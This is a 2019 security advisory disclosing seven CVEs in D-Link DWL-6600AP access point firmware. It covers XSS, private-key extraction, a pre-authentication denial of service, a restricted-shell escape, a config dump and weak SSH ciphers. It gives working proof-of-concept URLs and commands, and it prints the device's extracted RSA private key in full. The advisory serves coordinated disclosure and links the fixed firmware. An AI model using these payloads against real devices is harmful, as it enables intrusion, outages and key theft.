D-Link 6600-AP XSS / DoS / Information Disclosure

D-Link 6600-AP suffers from cross site scripting, key extraction, shell escape, config file disclosure, and denial of service vulnerabilities.


MD5 | 34d7b01b0cc7b4800d4f8258dd3e8990

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced
anymore but the support is still provided by D-Link as per described
on the D-Link website. Not that this product is built for business
customers of D-Link and we can expect to have thousands of devices at
risk. Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP

### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private
Key extraction
through http command
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to
the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to
the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction
through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee
Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o
BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B
vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t
7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c
unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk
1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6
J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14
yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z
0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc
fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB
i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb
dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ
OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ
VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9
J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr
H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw
uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy
yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd
pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co
paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8
1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm
fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS
okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px
bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx
MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp
bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL
MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU
MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG
A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE
CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu
OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp
wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC
I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW
2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK
YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N
29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B
AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS
7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME
9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5
beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE
45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef
MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==
-----END CERTIFICATE-----

### 3. Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept
kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL

Retrieve files via HTTP or FTP

Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')

DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
[email protected]'s password:
Enter 'help' for help.

DLINK-WLAN-AP# help

## Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this
Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - [email protected]
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources



Related Posts